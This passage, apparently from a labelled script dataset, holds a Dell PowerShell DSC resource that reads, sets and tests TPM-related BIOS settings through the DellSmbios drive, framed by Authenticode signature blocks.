b2Z0LmNvbS9wa2lvcHMvY3JsL01pY3Jvc29mdCUyMFRp // SIG // bWUtU3RhbXAlMjBQQ0ElMjAyMDEwKDEpLmNybDBsBggr // SIG // BgEFBQcBAQRgMF4wXAYIKwYBBQUHMAKGUGh0dHA6Ly93 // SIG // d3cubWljcm9zb2Z0LmNvbS9wa2lvcHMvY2VydHMvTWlj // SIG // cm9zb2Z0JTIwVGltZS1TdGFtcCUyMFBDQSUyMDIwMTAo // SIG // MSkuY3J0MAwGA1UdEwEB/wQCMAAwFgYDVR0lAQH/BAww // SIG // CgYIKwYBBQUHAwgwDgYDVR0PAQH/BAQDAgeAMA0GCSqG // SIG // SIb3DQEBCwUAA4ICAQDAE84OkfwNJXTuzKhsQ9VSY4uc // SIG // lQNYR29B3NGI7b+1pMUPIsH35bpV+VLOuLQ9/tzU9SZK // SIG // YVs2gFn9sCnQMN+UcbUBtYjjdxxGdF9t53XuCoP1n28e // SIG // axB5GfW8yp0f9jeQNevsP9aW8Cc3X0XJyU93C8msK/5G // SIG // IzFnetzj9Bpau9LmuFlBPz6OaVO60EW1hKEKM2NuIQKj // SIG // nMLkXJugm9CQXkzgnkQZ7RCoIynqeKUWkLe2/b7rE/e1 // SIG // niXH2laLJpj7bGbGsIJ6SI2wWuebR37pNLw5GbWyF41O // SIG // Jq+XZ7PXZ2pwXQUtj2Nzd4SHwjxDrM6rsBy5H5BWf/W8 // SIG // cPP3kSZXbaLpB6NemnxPwKj/7JphiYeWUdKZoFukHF/u // SIG // ta3YuZAyU8whWqDMmM1EtEhG8qw2f6dijrigGDZ4JY4j // SIG // pZZXLdLiVc9moH3Mxo47CotgEtVml7zoYGTZhsONkhQd // SIG // ampaGvCmrsfUNhxyxPIHnv+a4Dp8fc0m31VHOyHETaHa // SIG // uke7/kc/j+lyrToMgqlv/q4T5qf5+xatgRk0ZHMv/4Zk // SIG // t9qeqsoJa9iuDqCQyV8RbOpcHPA/OqpVHho1MqO4VcuV // SIG // b8gPstJhpxALgPObbDnFD5c8FhebL/geX89+Tlt1+EqZ // SIG // OUojbpZyxUTzOVwrEh6r3GwvEd6sI9sNXrz4WcQ7jTCC // SIG // B3EwggVZoAMCAQICEzMAAAAVxedrngKbSZkAAAAAABUw // SIG // DQYJKoZIhvcNAQELBQAwgYgxCzAJBgNVBAYTAlVTMRMw // SIG // EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRt // SIG // b25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRp // SIG // b24xMjAwBgNVBAMTKU1pY3Jvc29mdCBSb290IENlcnRp // SIG // ZmljYXRlIEF1dGhvcml0eSAyMDEwMB4XDTIxMDkzMDE4 // SIG // MjIyNVoXDTMwMDkzMDE4MzIyNVowfDELMAkGA1UEBhMC // SIG // VVMxEzARBgNVBAgTCldhc2hpbmd0b24xEDAOBgNVBAcT // SIG // B1JlZG1vbmQxHjAcBgNVBAoTFU1pY3Jvc29mdCBDb3Jw // SIG // b3JhdGlvbjEmMCQGA1UEAxMdTWljcm9zb2Z0IFRpbWUt // SIG // U3RhbXAgUENBIDIwMTAwggIiMA0GCSqGSIb3DQEBAQUA // SIG // A4ICDwAwggIKAoICAQDk4aZM57RyIQt5osvXJHm9DtWC // SIG // 0/3unAcH0qlsTnXIyjVX9gF/bErg4r25PhdgM/9cT8dm // SIG // 95VTcVrifkpa/rg2Z4VGIwy1jRPPdzLAEBjoYH1qUoNE // SIG // t6aORmsHFPPFdvWGUNzBRMhxXFExN6AKOG6N7dcP2CZT // SIG // fDlhAnrEqv1yaa8dq6z2Nr41JmTamDu6GnszrYBbfowQ // SIG // HJ1S/rboYiXcag/PXfT+jlPP1uyFVk3v3byNpOORj7I5 // SIG // LFGc6XBpDco2LXCOMcg1KL3jtIckw+DJj361VI/c+gVV // SIG // mG1oO5pGve2krnopN6zL64NF50ZuyjLVwIYwXE8s4mKy // SIG // zbnijYjklqwBSru+cakXW2dg3viSkR4dPf0gz3N9QZpG // SIG // dc3EXzTdEonW/aUgfX782Z5F37ZyL9t9X4C626p+Nuw2 // SIG // TPYrbqgSUei/BQOj0XOmTTd0lBw0gg/wEPK3Rxjtp+iZ // SIG // fD9M269ewvPV2HM9Q07BMzlMjgK8QmguEOqEUUbi0b1q // SIG // GFphAXPKZ6Je1yh2AuIzGHLXpyDwwvoSCtdjbwzJNmSL // SIG // W6CmgyFdXzB0kZSU2LlQ+QuJYfM2BjUYhEfb3BvR/bLU // SIG // HMVr9lxSUV0S2yW6r1AFemzFER1y7435UsSFF5PAPBXb // SIG // GjfHCBUYP3irRbb1Hode2o+eFnJpxq57t7c+auIurQID // SIG // AQABo4IB3TCCAdkwEgYJKwYBBAGCNxUBBAUCAwEAATAj // SIG // BgkrBgEEAYI3FQIEFgQUKqdS/mTEmr6CkTxGNSnPEP8v // SIG // BO4wHQYDVR0OBBYEFJ+nFV0AXmJdg/Tl0mWnG1M1Gely // SIG // MFwGA1UdIARVMFMwUQYMKwYBBAGCN0yDfQEBMEEwPwYI // SIG // KwYBBQUHAgEWM2h0dHA6Ly93d3cubWljcm9zb2Z0LmNv // SIG // bS9wa2lvcHMvRG9jcy9SZXBvc2l0b3J5Lmh0bTATBgNV // SIG // HSUEDDAKBggrBgEFBQcDCDAZBgkrBgEEAYI3FAIEDB4K // SIG // AFMAdQBiAEMAQTALBgNVHQ8EBAMCAYYwDwYDVR0TAQH/ // SIG // BAUwAwEB/zAfBgNVHSMEGDAWgBTV9lbLj+iiXGJo0T2U // SIG // kFvXzpoYxDBWBgNVHR8ETzBNMEugSaBHhkVodHRwOi8v // SIG // Y3JsLm1pY3Jvc29mdC5jb20vcGtpL2NybC9wcm9kdWN0 // SIG // cy9NaWNSb29DZXJBdXRfMjAxMC0wNi0yMy5jcmwwWgYI // SIG // KwYBBQUHAQEETjBMMEoGCCsGAQUFBzAChj5odHRwOi8v // SIG // d3d3Lm1pY3Jvc29mdC5jb20vcGtpL2NlcnRzL01pY1Jv // SIG // b0NlckF1dF8yMDEwLTA2LTIzLmNydDANBgkqhkiG9w0B // SIG // AQsFAAOCAgEAnVV9/Cqt4SwfZwExJFvhnnJL/Klv6lwU // SIG // tj5OR2R4sQaTlz0xM7U518JxNj/aZGx80HU5bbsPMeTC // SIG // j/ts0aGUGCLu6WZnOlNN3Zi6th542DYunKmCVgADsAW+ // SIG // iehp4LoJ7nvfam++Kctu2D9IdQHZGN5tggz1bSNU5HhT // SIG // dSRXud2f8449xvNo32X2pFaq95W2KFUn0CS9QKC/GbYS // SIG // EhFdPSfgQJY4rPf5KYnDvBewVIVCs/wMnosZiefwC2qB // SIG // woEZQhlSdYo2wh3DYXMuLGt7bj8sCXgU6ZGyqVvfSaN0 // SIG // DLzskYDSPeZKPmY7T7uG+jIa2Zb0j/aRAfbOxnT99kxy // SIG // bxCrdTDFNLB62FD+CljdQDzHVG2dY3RILLFORy3BFARx // SIG // v2T5JL5zbcqOCb2zAVdJVGTZc9d/HltEAY5aGZFrDZ+k // SIG // KNxnGSgkujhLmm77IVRrakURR6nxt67I6IleT53S0Ex2 // SIG // tVdUCbFpAUR+fKFhbHP+CrvsQWY9af3LwUFJfn6Tvsv4 // SIG // O+S3Fb+0zj6lMVGEvL8CwYKiexcdFYmNcP7ntdAoGokL // SIG // jzbaukz5m/8K6TT4JDVnK+ANuOaMmdbhIurwJ0I9JZTm // SIG // dHRbatGePu1+oDEzfbzL6Xu/OHBE0ZDxyKs6ijoIYn/Z // SIG // cGNTTY3ugm2lBRDBcQZqELQdVTNYs6FwZvKhggLUMIIC // SIG // PQIBATCCAQChgdikgdUwgdIxCzAJBgNVBAYTAlVTMRMw // SIG // EQYDVQQIEwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRt // SIG // b25kMR4wHAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRp // SIG // b24xLTArBgNVBAsTJE1pY3Jvc29mdCBJcmVsYW5kIE9w // SIG // ZXJhdGlvbnMgTGltaXRlZDEmMCQGA1UECxMdVGhhbGVz // SIG // IFRTUyBFU046MTc5RS00QkIwLTgyNDYxJTAjBgNVBAMT // SIG // HE1pY3Jvc29mdCBUaW1lLVN0YW1wIFNlcnZpY2WiIwoB // SIG // ATAHBgUrDgMCGgMVAG3z0dXwV+h8WH8j8fM2MyVOXyEM // SIG // oIGDMIGApH4wfDELMAkGA1UEBhMCVVMxEzARBgNVBAgT // SIG // Cldhc2hpbmd0b24xEDAOBgNVBAcTB1JlZG1vbmQxHjAc // SIG // BgNVBAoTFU1pY3Jvc29mdCBDb3Jwb3JhdGlvbjEmMCQG // SIG // A1UEAxMdTWljcm9zb2Z0IFRpbWUtU3RhbXAgUENBIDIw // SIG // MTAwDQYJKoZIhvcNAQEFBQACBQDpimfaMCIYDzIwMjQw // SIG // MjI5MTAxODAyWhgPMjAyNDAzMDExMDE4MDJaMHQwOgYK // SIG // KwYBBAGEWQoEATEsMCowCgIFAOmKZ9oCAQAwBwIBAAIC // SIG // BJwwBwIBAAICE5gwCgIFAOmLuVoCAQAwNgYKKwYBBAGE // SIG // WQoEAjEoMCYwDAYKKwYBBAGEWQoDAqAKMAgCAQACAweh // SIG // IKEKMAgCAQACAwGGoDANBgkqhkiG9w0BAQUFAAOBgQCQ // SIG // gHSenTut32jSbiod8OYyqtGBvblK13L5DlhDrb0ptT15 // SIG // CBiGjBZ6Bpl63CNC4rYNxg8TAKRcHuA8bJeKiBdOQ/Sp // SIG // HhiH/z4eV0jwEtmcCERbYXLRH5Yy6wAzazLYyLyYjJco // SIG // MfPE5RyevXFFPUTt3aLoe0hR9EZKd+jkOPnIoDGCBA0w // SIG // ggQJAgEBMIGTMHwxCzAJBgNVBAYTAlVTMRMwEQYDVQQI // SIG // EwpXYXNoaW5ndG9uMRAwDgYDVQQHEwdSZWRtb25kMR4w // SIG // HAYDVQQKExVNaWNyb3NvZnQgQ29ycG9yYXRpb24xJjAk // SIG // BgNVBAMTHU1pY3Jvc29mdCBUaW1lLVN0YW1wIFBDQSAy // SIG // MDEwAhMzAAAB4NT8HxMVH35dAAEAAAHgMA0GCWCGSAFl // SIG // AwQCAQUAoIIBSjAaBgkqhkiG9w0BCQMxDQYLKoZIhvcN // SIG // AQkQAQQwLwYJKoZIhvcNAQkEMSIEIAD+upBQ3PlDKRX4 // SIG // YDXeWLF+uE2ETo68boc8w4MQ/nmAMIH6BgsqhkiG9w0B // SIG // CRACLzGB6jCB5zCB5DCBvQQg4+5Sv/I55W04z73O+wwg // SIG // km+E2QKWPZyZucIbCv9pCsEwgZgwgYCkfjB8MQswCQYD // SIG // VQQGEwJVUzETMBEGA1UECBMKV2FzaGluZ3RvbjEQMA4G // SIG // A1UEBxMHUmVkbW9uZDEeMBwGA1UEChMVTWljcm9zb2Z0 // SIG // IENvcnBvcmF0aW9uMSYwJAYDVQQDEx1NaWNyb3NvZnQg // SIG // VGltZS1TdGFtcCBQQ0EgMjAxMAITMwAAAeDU/B8TFR9+ // SIG // XQABAAAB4DAiBCClp02fd7pEXGfszJszVjngjfErxxZn // SIG // RP3oLvYqmVXMejANBgkqhkiG9w0BAQsFAASCAgAEQ9e7 // SIG // Mnv0xz4Vt0KTLS1C6kIO2ys+5VON4VYrERRqDOlsMYtk // SIG // eDN0epZMUNf9XGVOSdpAh97IJIM6Zbo7Cdw9hVyyuAWK // SIG // a1y5aAjJdCy+t8x/1Ibbq0M3Dm5AEbFyxRFGb1i7Lh3D // SIG // ZypjmidkdrwN8/NtzWofVzYu49frKtd55ZxR/6TBq+iV // SIG // k8U9PiUvLgDJRw5BDF+K7S0M/Xt10ktltWAGS5CVOtpt // SIG // pKGe2BDfRN4WfCjR1Yi50e4e8Xn7E5dLt2Vu0hxAoJNa // SIG // 4lYvhPpziLoMohHHKaIow4+weYV5wdOtzBpHC49qiJMt // SIG // Yn7vFVmCt0SKP4wFW/4ss2e9XXrgGD9twDOygCKyesHi // SIG // 7KtJ4iIygTGXDqMYFkNP7siavRQ7yWo7LloolUCJYrDI // SIG // 8anQ6pyfHheRSexJri+dMlQoI+JuqLGqAgRjb9BP3Mxo // SIG // D/VgkCn+R9D+bvLL00XgYb2nE/8gVbiqGFdizUSE7ZtV // SIG // pZSdKeL2PuElsDc6rH+JZMNMQi60rdZIt/uOuq0H7/hu // SIG // CynhIZbUu5P3BAD1raPgDlbYnhWPVo3XiIJABD1K72iG // SIG // hRjrBpKsbAfQY4QSRg/UoXk+0s9O/kU+LCQ8OmCt5Psl // SIG // uyA7WIq+o3BhmFJ3Op3p9oHHKCFQdYMiVfRUBROTELC3 // SIG // Wi5h7vaEeuwFueSKFg== // SIG // End signature block
combined_dataset/train/non-malicious/sample_59_72.ps1
sample_59_72.ps1
# Import the helper functions Import-Module $PSScriptRoot\..\..\Misc\helper.psm1 -Verbose:$false function Get-TargetResource { [CmdletBinding()] [OutputType([System.Collections.Hashtable])] param ( [parameter(Mandatory = $true)] [System.String] $Category ) #Write-Verbose "Use this cmdlet to deliver information about command processing." #Write-Debug "Use this cmdlet to write debug information while troubleshooting." <# $returnValue = @{ Category = [System.String] TPMSecurity = [System.String] TPMCommand = [System.String] Password = [System.String] SecurePassword = [System.String] PathToKey = [System.String] } $returnValue #> # Check if module DellBIOSprovider is already loaded. If not, load it. try{ $bool = Confirm-DellPSDrive -verbose } catch { write-Verbose $_ $msg = "Get-TargetResource: $($_.Exception.Message)" Write-DellEventLog -Message $msg -EventID 1 -EntryType 'Error' write-Verbose "Exiting Get-TargetResource" return } if ($bool) { Write-Verbose "Dell PS-Drive DellSmbios is found." } else{ $Message = “Get-TargetResource: Module DellBiosProvider was imported correctly." Write-DellEventLog -Message $Message -EventID 2 } $Get = get-childitem -path @("DellSmbios:\" + $Category) # Removing Verbose and Debug from output $PSBoundParameters.Remove("Verbose") | out-null $PSBoundParameters.Remove("Debug") | out-null $out = @{} $Get | foreach-Object {$out.Add($_.Attribute, $_.CurrentValue)} $out.add('Category', $Category ) $out } function Set-TargetResource { [CmdletBinding()] param ( [parameter(Mandatory = $true)] [System.String] $Category, [ValidateSet("Enabled","Disabled")] [System.String] $TpmSecurity, [ValidateSet("Enabled","Disabled")] [System.String] $TpmActivation, [ValidateSet("Enabled","Disabled")] [System.String] $TpmPpiAcpi, [ValidateSet("Enabled","Disabled")] [System.String] $TpmPpiPo, [ValidateSet("Enabled","Disabled")] [System.String] $TpmPpiDpo, [ValidateSet("Enabled","Disabled")] [System.String] $TpmPpiClearOverride, [System.String] $Password, [System.String] $SecurePassword, [System.String] $PathToKey ) if (-not(CheckModuleLoaded)) { Write-Verbose -Message 'Required module DellBiosProvider does not exist. Exiting.' return $true } $DellPSDrive = get-psdrive -name Dellsmbios if ( !$DellPSDrive) { $Message = "Drive DellSmbios is not found. Exiting." Write-Verbose $Message Write-DellEventLog -Message $Message -EventID 3 -EntryType "Error" return $true } $attributes_desired = $PSBoundParameters $atts = $attributes_desired $pathToCategory = $DellPSDrive.Name + ':\' + $atts["Category"] Dir $pathToCategory -verbose $atts.Remove("Verbose") | out-null $atts.Remove("Category") | out-null $atts.Remove("Debug") | out-null $securePwd=$atts["SecurePassword"] $passwordSet=$atts["Password"] $atts.Remove("Password") | Out-Null $atts.Remove("SecurePassword") | Out-Null $pathToKey=$atts["PathToKey"] if(-Not [string]::IsNullOrEmpty($pathToKey)) { if(Test-Path $pathToKey) { $key=Get-Content $pathToKey } else { $key="" } } $atts.Remove("PathToKey") | Out-Null #foreach($a in Import-Csv((Get-DellBIOSEncryptionKey))) #{ # $key+=$a # } $atts.Keys | foreach-object { # $atts[$_] $path = $pathToCategory + '\' + $($_) $value = $atts[$_] if(-Not [string]::IsNullOrEmpty($securePwd)) { $pasvar=ConvertTo-SecureString $securePwd.ToString() -Key $key Set-Item -path $path -value $value -verbose -ErrorVariable ev -ErrorAction SilentlyContinue -PasswordSecure $pasvar } elseif(-Not [string]::IsNullOrEmpty($passwordSet)) { Set-Item -path $path -value $value -verbose -ErrorVariable ev -ErrorAction SilentlyContinue -Password $passwordSet } else { Set-Item -path $path -value $value -verbose -ErrorVariable ev -ErrorAction SilentlyContinue } if ( $ev) { $cmdline = $ExecutionContext.InvokeCommand.ExpandString($ev.InvocationInfo.Line) $Message = "An error occured in executing " + $cmdline + "`nError message: $($ev.ErrorDetails)" Write-Verbose $Message Write-DellEventLog -Message $Message -EventID 5 -EntryType "Error" } } } function Test-TargetResource { [CmdletBinding()] [OutputType([System.Boolean])] param ( [parameter(Mandatory = $true)] [System.String] $Category, [ValidateSet("Enabled","Disabled")] [System.String] $TpmSecurity, [ValidateSet("Enabled","Disabled")] [System.String] $TpmActivation, [ValidateSet("Enabled","Disabled")] [System.String] $TpmPpiAcpi, [ValidateSet("Enabled","Disabled")] [System.String] $TpmPpiPo, [ValidateSet("Enabled","Disabled")] [System.String] $TpmPpiDpo, [ValidateSet("Enabled","Disabled")] [System.String] $TpmPpiClearOverride, [System.String] $Password, [System.String] $SecurePassword, [System.String] $PathToKey ) $Get = Get-TargetResource $PSBoundParameters['Category'] -verbose New-DellEventLog $PSBoundParameters.Remove("Verbose") | out-null $PSBoundParameters.Remove("Debug") | out-null $PSBoundParameters.Remove("Category") | out-null $PSBoundParameters.Remove("Password") | out-null $PSBoundParameters.Remove("SecurePassword") | out-null $attributes_desired = $PSBoundParameters $bool = $true foreach ($config_att in $PSBoundParameters.GetEnumerator()) { if ($Get.ContainsKey($config_att.Key)) { $currentvalue = $Get[$config_att.Key] $currentvalue_nospace = $currentvalue -replace " ", "" if ($config_att.Value -ne $currentvalue_nospace){ $bool = $false $drift = "`nCurrentValue: $currentvalue_nospace`nDesiredValue: $($config_att.value)" $message = "Configuration is drifted in category $Category for $($config_att.Key). $drift" write-verbose $message Write-DellEventLog -Message $message -EventID 4 -EntryType Warning } else { write-Debug "Configuration is same for $config_att." } } else { $message = "Unsupported attribute $($config_att)" Write-Verbose $message } } return $bool } Export-ModuleMember -Function *-TargetResource # SIG # Begin signature block # MIIqwgYJKoZIhvcNAQcCoIIqszCCKq8CAQExDzANBglghkgBZQMEAgEFADB5Bgor # BgEEAYI3AgEEoGswaTA0BgorBgEEAYI3AgEeMCYCAwEAAAQQH8w7YFlLCE63JNLG # KX7zUQIBAAIBAAIBAAIBAAIBADAxMA0GCWCGSAFlAwQCAQUABCAMfXaBeWgA7acN # N18sWQOBvmuQPOFp0x8wKhXGw2+DWaCCElwwggXfMIIEx6ADAgECAhBOQOQ3VO3m # jAAAAABR05R/MA0GCSqGSIb3DQEBCwUAMIG+MQswCQYDVQQGEwJVUzEWMBQGA1UE # ChMNRW50cnVzdCwgSW5jLjEoMCYGA1UECxMfU2VlIHd3dy5lbnRydXN0Lm5ldC9s # ZWdhbC10ZXJtczE5MDcGA1UECxMwKGMpIDIwMDkgRW50cnVzdCwgSW5jLiAtIGZv # ciBhdXRob3JpemVkIHVzZSBvbmx5MTIwMAYDVQQDEylFbnRydXN0IFJvb3QgQ2Vy # dGlmaWNhdGlvbiBBdXRob3JpdHkgLSBHMjAeFw0yMTA1MDcxNTQzNDVaFw0zMDEx # MDcxNjEzNDVaMGkxCzAJBgNVBAYTAlVTMRYwFAYDVQQKDA1FbnRydXN0LCBJbmMu # MUIwQAYDVQQDDDlFbnRydXN0IENvZGUgU2lnbmluZyBSb290IENlcnRpZmljYXRp # b24gQXV0aG9yaXR5IC0gQ1NCUjEwggIiMA0GCSqGSIb3DQEBAQUAA4ICDwAwggIK # AoICAQCngY/3FEW2YkPy2K7TJV5IT1G/xX2fUBw10dZ+YSqUGW0nRqSmGl33VFFq # gCLGqGZ1TVSDyV5oG6v2W2Swra0gvVTvRmttAudFrnX2joq5Mi6LuHccUk15iF+l # OhjJUCyXJy2/2gB9Y3/vMuxGh2Pbmp/DWiE2e/mb1cqgbnIs/OHxnnBNCFYVb5Cr # +0i6udfBgniFZS5/tcnA4hS3NxFBBuKK4Kj25X62eAUBw2DtTwdBLgoTSeOQm3/d # vfqsv2RR0VybtPVc51z/O5uloBrXfQmywrf/bhy8yH3m6Sv8crMU6UpVEoScRCV1 # HfYq8E+lID1oJethl3wP5bY9867DwRG8G47M4EcwXkIAhnHjWKwGymUfe5SmS1dn # DH5erXhnW1XjXuvH2OxMbobL89z4n4eqclgSD32m+PhCOTs8LOQyTUmM4OEAwjig # nPqEPkHcblauxhpb9GdoBQHNG7+uh7ydU/Yu6LZr5JnexU+HWKjSZR7IH9Vybu5Z # HFc7CXKd18q3kMbNe0WSkUIDTH0/yvKquMIOhvMQn0YupGaGaFpoGHApOBGAYGuK # Q6NzbOOzazf/5p1nAZKG3y9I0ftQYNVc/iHTAUJj/u9wtBfAj6ju08FLXxLq/f0u # DodEYOOp9MIYo+P9zgyEIg3zp3jak/PbOM+5LzPG/wc8Xr5F0wIDAQABo4IBKzCC # AScwDgYDVR0PAQH/BAQDAgGGMBIGA1UdEwEB/wQIMAYBAf8CAQEwHQYDVR0lBBYw # FAYIKwYBBQUHAwMGCCsGAQUFBwMIMDsGA1UdIAQ0MDIwMAYEVR0gADAoMCYGCCsG # AQUFBwIBFhpodHRwOi8vd3d3LmVudHJ1c3QubmV0L3JwYTAzBggrBgEFBQcBAQQn # MCUwIwYIKwYBBQUHMAGGF2h0dHA6Ly9vY3NwLmVudHJ1c3QubmV0MDAGA1UdHwQp # MCcwJaAjoCGGH2h0dHA6Ly9jcmwuZW50cnVzdC5uZXQvZzJjYS5jcmwwHQYDVR0O # BBYEFIK61j2Xzp/PceiSN6/9s7VpNVfPMB8GA1UdIwQYMBaAFGpyJnrQHu995ztp # UdRsjZ+QEmarMA0GCSqGSIb3DQEBCwUAA4IBAQAfXkEEtoNwJFMsVXMdZTrA7LR7 # BJheWTgTCaRZlEJeUL9PbG4lIJCTWEAN9Rm0Yu4kXsIBWBUCHRAJb6jU+5J+Nzg+ # LxR9jx1DNmSzZhNfFMylcfdbIUvGl77clfxwfREc0yHd0CQ5KcX+Chqlz3t57jpv # 3ty/6RHdFoMI0yyNf02oFHkvBWFSOOtg8xRofcuyiq3AlFzkJg4sit1Gw87kVlHF # VuOFuE2bRXKLB/GK+0m4X9HyloFdaVIk8Qgj0tYjD+uL136LwZNr+vFie1jpUJuX # bheIDeHGQ5jXgWG2hZ1H7LGerj8gO0Od2KIc4NR8CMKvdgb4YmZ6tvf6yK81MIIG # ATCCA+mgAwIBAgIQKcjO4K8g4fYFFpiqGB6UiDANBgkqhkiG9w0BAQ0FADBPMQsw # CQYDVQQGEwJVUzEWMBQGA1UEChMNRW50cnVzdCwgSW5jLjEoMCYGA1UEAxMfRW50 # cnVzdCBDb2RlIFNpZ25pbmcgQ0EgLSBPVkNTMjAeFw0yMzA5MjExNTMxMjZaFw0y # NDA5MjExNTMxMjVaMH4xCzAJBgNVBAYTAlVTMQ4wDAYDVQQIEwVUZXhhczETMBEG # A1UEBxMKUm91bmQgUm9jazERMA8GA1UEChMIRGVsbCBJbmMxJDAiBgNVBAsTG0RV # UCBDbGllbnQgQ3JlYXRpb24gU2VydmljZTERMA8GA1UEAxMIRGVsbCBJbmMwggGi # MA0GCSqGSIb3DQEBAQUAA4IBjwAwggGKAoIBgQCMaBhwV7jJkdmP+tXH06aqD1fq # fge3rGr6hGz+V/ifIReHg8LxzLxOspMPj6t8IpXRcpkV3tt3fg793FCg4jfSWVmR # inwVJOHD8bR6XUNfLbtS/1M/PsSQijNKdSbL1nDKcIF5JfeN6CgkdU9AateJGLKF # Qc9YUgbNnnwlrHWjQmV78Cu4TDz7dOxjrwnRMTXe9wPL+38nwRZYOo97bBYmtTjW # LGfZOfg3e9DypJykJ1kQqGUa9O5PLAfvQb+NOi8gSpn3+XkliY29xx0ocQQrGDG8 # +KzfjXjGArElKBwjVirQaLhpBeeaWuDNeKTcJOzYL9Sh9IzVNpuBPwiImin5Za7S # KwyEPlPAsFgCduEsKCoWq67MPx0z7bGRPwp5Y03KZGJUDxQAG+PlI3jvjFZiZ6YB # Xi4TStiisY6t0Ol5kpE2lKHp3Pt/9iam1x7/y0EiQtkMXTuep1qdc3Waa7s0jEDD # 3/T4AknlkfhROxP85xaii32M9In0Tqr1hPm3pqsCAwEAAaOCASgwggEkMAwGA1Ud # EwEB/wQCMAAwHQYDVR0OBBYEFBFKGdzeU/CRsp0sA1HLF7oe6ORSMB8GA1UdIwQY # MBaAFO+funmwc/IlHnicA1KcG1OE3o3tMGcGCCsGAQUFBwEBBFswWTAjBggrBgEF # BQcwAYYXaHR0cDovL29jc3AuZW50cnVzdC5uZXQwMgYIKwYBBQUHMAKGJmh0dHA6 # Ly9haWEuZW50cnVzdC5uZXQvb3ZjczItY2hhaW4ucDdjMDEGA1UdHwQqMCgwJqAk # oCKGIGh0dHA6Ly9jcmwuZW50cnVzdC5uZXQvb3ZjczIuY3JsMA4GA1UdDwEB/wQE # AwIHgDATBgNVHSUEDDAKBggrBgEFBQcDAzATBgNVHSAEDDAKMAgGBmeBDAEEATAN # BgkqhkiG9w0BAQ0FAAOCAgEAGtZRY5WmdTQbQGP/Nx77+u6udEUQn40GDjXPfT4j # nVlhJ99N35giv1mWstRXxOqY7YauotNcUNzep1d8oV5/YKc7+x0s/ZwuNQmLtVyb # VSrDy7DJiYNle/4am6GDefIUMMWgr8BGY8n/LdDVfL9Gir72V+HOe2N4cVnti0Ti # U9/1ebEdhKd/a0awP+mh8EZG7OJ41A1JkPc4rjsh3yfQi5AQ4P1RF1hSgudkZpQI # 8051WnnwjStKEWA2uiX3x2z63TvrPtdaJoYbtIniUx9ZVg3373sV8StFwPcyPzqX # 9Eod7Goj4D+Vg3bB73jjG+miuykSjxNHVnhNB7EnCVffnsD5hJHRXGRCZvof59id # NhpkuF0G4ZIYDrAF06HvJ4kxyGZCiNi6oJxfyndhG4FsCPI4XiE0n1N25lx1GeJZ # tgRH7okPBMOu3rYTQDH2+g85yNBwap18EC7XDTyi7H/Ih616pG9ca9Xv4MsptRU9 # 6UXqPemiXG9TbuEsBWgu6YYx0qBMlIT+bqDbghkpeXrF/zRjDBAD9p38VHnqay3B # r4RTbap/gUMQzgD2P2f6axjAg3yZaXab1qtI7VZptyXmVK7nRPwXCZmTR6SnxCaS # 7gD2GtIZiCiztpBq6zJEQhS39BQoXVV0bQ7k+m1ZX2VW0z8Ld54PZlbc8vnP1YcA # iyowggZwMIIEWKADAgECAhBx71V0rzVUw1osafZvS2vNMA0GCSqGSIb3DQEBDQUA # MGkxCzAJBgNVBAYTAlVTMRYwFAYDVQQKDA1FbnRydXN0LCBJbmMuMUIwQAYDVQQD # DDlFbnRydXN0IENvZGUgU2lnbmluZyBSb290IENlcnRpZmljYXRpb24gQXV0aG9y # aXR5IC0gQ1NCUjEwHhcNMjEwNTA3MTkyMDQ1WhcNNDAxMjI5MjM1OTAwWjBPMQsw # CQYDVQQGEwJVUzEWMBQGA1UEChMNRW50cnVzdCwgSW5jLjEoMCYGA1UEAxMfRW50 # cnVzdCBDb2RlIFNpZ25pbmcgQ0EgLSBPVkNTMjCCAiIwDQYJKoZIhvcNAQEBBQAD # ggIPADCCAgoCggIBAJ6ZdhcanlYXCGMsk02DYYQzNAK22WKg3sIOuSBMyFedD91U # Ww0M1gHdL0jhkQnh28gVBIK2e/DY1jA7GXFw+6iml/YpXaQMqfRTPlfbDE5u/Hbb # XyTpql9D45PnDs/KJbzETDALWg/mBvTlbgyZZlhPg2HCc3xcIm8BRcUP90BPZEvQ # FwqpDh4CL6GPTPJnUNs+5J/CTz906zGk0JTQmbwwkglqyyTNoth2UtBOdZhPZFrS # XoP0WMBdanXE2D9kOosUDdh24eq5a+cRcEkROGMTbvHG+r0QRTUH5nYV0HUWqsJD # V/6r/mNzRiKguPPkx3BGCfmpN0Gas0tsH3Byowf2NZJ0EWRu+QLVwJKV8ZdZfg3u # oiXycVW4m42/ze6u3fsM564yTlCNod/Rc7/Bzn912qu/0K2COMXniO2ibTqGEbfX # sOGoizsMQReaX+RbmMidAJ/3c9LD6Z8Fh3khg9YL7dHMCJ/g8cXJWLpTX9SHsYtZ # qNJezWnQPvrEOQmvtLXt5zz6IofWc/kXlWrDHPVVeF/U+gvAWz+MeBUOWkw6buUm # mNAnzCDfwIY7eo1lRn7ZYV6p9K4+1PyvRcc6s4UESovICV2zewIoWeOGfYCiWEBm # YuA4VYOrnylBJrq76dhk+La7KHPNFUrXnnPjZkyxUZ2BI4vIhneytiw3InAhAgMB # AAGjggEsMIIBKDASBgNVHRMBAf8ECDAGAQH/AgEAMB0GA1UdDgQWBBTvn7p5sHPy # JR54nANSnBtThN6N7TAfBgNVHSMEGDAWgBSCutY9l86fz3Hokjev/bO1aTVXzzAz # BggrBgEFBQcBAQQnMCUwIwYIKwYBBQUHMAGGF2h0dHA6Ly9vY3NwLmVudHJ1c3Qu # bmV0MDEGA1UdHwQqMCgwJqAkoCKGIGh0dHA6Ly9jcmwuZW50cnVzdC5uZXQvY3Ni # cjEuY3JsMA4GA1UdDwEB/wQEAwIBhjATBgNVHSUEDDAKBggrBgEFBQcDAzBFBgNV # HSAEPjA8MDAGBFUdIAAwKDAmBggrBgEFBQcCARYaaHR0cDovL3d3dy5lbnRydXN0 # Lm5ldC9ycGEwCAYGZ4EMAQQBMA0GCSqGSIb3DQEBDQUAA4ICAQBe84aZNcF57vAQ # r9eSQ9KF0FvgmKDgcVHJFMtQmmAOsAQmSbHP6bqbCKHaQ13UbyOiufhAx0f+TQEL # SJA/yNxqtD5TNSi+QEpHhWoed0DMgH9htDxPeajmo6agfkSGcb8SG5WBcvcNpdDe # Z5/Gorjxavn8/nRmxmTmeT1qA2FOSx/MIGLLAhjsY+1+cT+WugteaCJn7B/A0gUW # 